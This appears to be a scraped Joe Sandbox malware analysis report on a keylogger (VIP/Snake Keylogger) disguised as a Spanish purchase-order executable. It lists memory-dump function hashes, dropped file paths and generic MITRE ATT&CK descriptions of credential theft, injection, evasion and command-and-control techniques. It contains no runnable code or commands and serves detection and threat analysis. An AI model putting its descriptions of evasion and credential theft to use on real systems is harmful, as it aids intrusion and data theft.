Snapshot File: hcaresult_17_2_5de0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 963276372b927b90e924db18bf82d4f7233b46781791bc50966c0b6a8a52b7b6
Instruction ID: 4ebc831ad9183f1ece5972b5eef8f1eebfa7c3193261bd0fa817b33f3f2dda61
Opcode Fuzzy Hash: 963276372b927b90e924db18bf82d4f7233b46781791bc50966c0b6a8a52b7b6
Instruction Fuzzy Hash: CED05B3270046047CE157798656977C2B71DF80915B09017AD50A7F6C6CF681D1787D9

Function 05DE3920 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2328609401.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5de0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94bb2fe3fd46e4bce2f5faeb9018f9f85f5822f58f74faed14539a20360e12d3
Instruction ID: 780bf7cfc2bd39c7a9b5cd161e78541eda46409bb77df9f4febc7a389b08c711
Opcode Fuzzy Hash: 94bb2fe3fd46e4bce2f5faeb9018f9f85f5822f58f74faed14539a20360e12d3
Instruction Fuzzy Hash: E5D05E393446180BC70E6648A0207DA76DE8FCD752F04806BE50A8B391CAB19C0082E5

Function 05DE3400 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2328609401.0000000005DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5de0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 127d8dc46fc932aa42a0c8f22d10606e85b3f14fe59ebfad577dfdfdcb48d85a
Instruction ID: 37ca35a0c670f04e7c94f80b665d17e2107b3f87a7a7147e318bdd2f8af37451
Opcode Fuzzy Hash: 127d8dc46fc932aa42a0c8f22d10606e85b3f14fe59ebfad577dfdfdcb48d85a
Instruction Fuzzy Hash: 87D01232755A7517491A33D9783D6BD35AADB81D21B04002BF00B9B781DEAC1D1383EE

Function 00DC8340 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2309492594.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_dc0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3123b63fb01648ca88a8aeb49348b794af9253fa184415d1a329283e7c602872
Instruction ID: 1fad2945e938d25b2875c316e11c55b9da0be36aa5fc95f0d8437399ecdd7a3b
Opcode Fuzzy Hash: 3123b63fb01648ca88a8aeb49348b794af9253fa184415d1a329283e7c602872
Instruction Fuzzy Hash: 91D02B3040D3874FC302F730F8281583BB1FF8210430841E1D1540F12BEAB9490697E5

Function 00DCAF1D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2309492594.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_dc0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1631f6cf45b55310105311cf87b77a6eb46134f107526e896de8aebbab16fb16
Instruction ID: 5293d2d0319fc622a244e94185c690bc7b7e97cec0f1cabeef72424126ff6bd7
Opcode Fuzzy Hash: 1631f6cf45b55310105311cf87b77a6eb46134f107526e896de8aebbab16fb16
Instruction Fuzzy Hash: 74D0173AB00008EFDB008F88E8409DDB7B6FB88221B008026E915A3220C6319D61CB50

Function 00DCD9E1 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2309492594.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_dc0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4984b348b51dc133d5f9720b9cf3d8c240c34ac49add2fc3dfd39e67dbeb2b0
Instruction ID: 969fd1031334fa591b2864ee3b6e10da0a1cdb350633e71f26c3e3bfe9ee85cc
Opcode Fuzzy Hash: b4984b348b51dc133d5f9720b9cf3d8c240c34ac49add2fc3dfd39e67dbeb2b0
Instruction Fuzzy Hash: 8FC08C9042E7C50FEF1733222C990D83F72DA132D23C900C2C080CB01B840C290FD364

Function 00DC8350 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2309492594.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_dc0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 636bd6ea06d3299ab4f8459480a5d9972c0b7c9da5d158998c108fb8ab93ab99
Instruction ID: ad7da1406ae0f08ebf731308bf1ec39ad63b35f1d625c9fdaa6e7e3330b03e02
Opcode Fuzzy Hash: 636bd6ea06d3299ab4f8459480a5d9972c0b7c9da5d158998c108fb8ab93ab99
Instruction Fuzzy Hash: A7C0123040870B8BD605F765F84451933AAFFC06047448620A0050A21EEF78AD5547D1

Function 00DC6712 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2309492594.0000000000DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_dc0000_xload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e9fe1d529d652e8e64230c43f7e08e4bf393baa12aa678437387ce2cd5f1630
Instruction ID: 35ace3b0cc0e6109643936cb3776556198cd1b0a5f4374bdc252eebae8abc8a6
Opcode Fuzzy Hash: 3e9fe1d529d652e8e64230c43f7e08e4bf393baa12aa678437387ce2cd5f1630
Instruction Fuzzy Hash: CCB012B648634A4FDF01733C398C0C53F30F62129139107B1C141C2C0B540D190BC223

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xload.exe.log

C:\Users\user\AppData\Roaming\xload.exe

C:\Users\user\AppData\Roaming\xload.exe:Zone.Identifier

\Device\Null

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Windows Analysis Report
CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre